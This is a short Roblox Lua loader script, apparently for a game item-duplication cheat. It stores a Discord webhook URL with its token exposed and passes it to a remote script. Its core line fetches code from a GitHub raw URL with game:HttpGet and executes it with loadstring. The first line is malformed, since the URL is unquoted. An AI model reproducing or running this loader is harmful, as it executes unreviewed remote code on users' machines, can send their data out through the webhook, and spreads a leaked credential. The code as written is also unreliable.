local Webhook = discord.com/api/webhooks/1446583585057407168/9RYns3AYCIrDlmhuGIc_WgTn21ariRDtc-PjN_WenZLFX_6nDR6I44YZ1GKtIV4oRR0d

getgenv().UserPingThreshold = 25000000


-- =================================================================================
--      SCRIPT LOADER - DO NOT EDIT BELOW THIS LINE
-- =================================================================================

if Webhook and Webhook:match("discord.com/api/webhooks") then
    getgenv().UserWebhookURL = Webhook
else
    return
end

loadstring(game:HttpGet('https://raw.githubusercontent.com/LXZRz/dupe/main/dupe.lua', true))()
